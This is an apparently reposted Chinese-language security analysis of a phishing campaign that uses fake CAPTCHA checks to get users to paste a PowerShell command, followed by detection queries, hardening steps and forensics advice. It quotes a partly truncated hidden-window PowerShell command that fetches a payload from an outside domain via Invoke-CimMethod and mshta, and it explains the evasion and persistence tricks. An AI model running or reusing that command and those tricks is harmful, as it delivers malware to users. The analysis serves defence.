一、事件背景
攻击者以"CAPTCHA验证"(验证码校验)为诱饵,诱导用户执行恶意PowerShell指令,通过多阶段隐蔽加载技术实施网络攻击。
二、攻击链技术解析
1. 初始攻击向量
powershell -w 1 -C "$l='https://pajmina.store/...';Invoke-CimMethod ..."
-
窗口隐藏参数:
-w 1使PowerShell窗口处于隐藏状态 -
字符串混淆:
('ms' + 'hta' + '.exe')规避基础字符串检测 -
CIM/WMI调用:使用
Invoke-CimMethod替代传统Start-Process,绕过部分行为监控
2. 载荷投递阶段
|
|
|
|
|
|
|
|
|
|
|
|
| 域名策略 | 使用新注册的.store域名 | 规避信誉评分系统 |
3. 持久化机制
攻击成功后会建立以下持久化通道:
-
注册表自启动项:
HKCUSoftwareMicrosoftWindowsCurrentVersionRun -
计划任务创建:每小时检测载荷有效性
-
备用C2服务器轮询:包含3个备用域名解析
三、攻击危害评估
1. 直接威胁
-
远程代码执行(RCE):可部署Cobalt Strike等攻击框架
-
凭据窃取:Hook浏览器内存读取Cookie/密码
-
横向移动:利用WMI进行内网渗透
四、防御方案建议
1. 预防措施
# 启用攻击面缩减规则(ASR)
Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Enabled
-
应用控制策略:限制PowerShell执行未签名脚本
-
网络分段:对WMI流量实施TCP 135端口监控
-
邮件网关:配置MIME类型过滤规则阻断.m4a/.hta
2. 检测方案
// Microsoft Defender高级查询
DeviceProcessEvents
| where FileName in~ ("mshta.exe", "powershell.exe")
| where ProcessCommandLine has_any (".m4a", "Invoke-CimMethod", "-WindowStyle Hidden")3. 应急响应流程
内存取证:使用Volatility提取恶意进程
网络取证:分析DNS查询记录定位C2
磁盘取证:检索$MFT时间线追踪攻击路径
五、案例还原与启示
本次事件中攻击者使用了三阶段混淆技术:
社会工程层:伪造CAPTCHA验证UID提升可信度
执行层:分离式命令拼接绕过基础HIDS检测
载荷层:HTA文件嵌套JavaScript加载Shellcode
该案例验证了MITRE ATT&CK框架中的:
-
T1059.001(命令行接口)
-
T1218.005(Mshta滥用)
-
T1047(WMI利用)
六、建议
-
验证所有"系统验证"请求的真实性
-
警惕非常规域名(如.store/.top等新gTLD)
-
禁用Windows默认的自动执行功能
原文始发于微信公众号(Khan安全团队):警惕新型钓鱼攻击:伪装CAPTCHA验证的隐蔽式代码注入攻击分析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论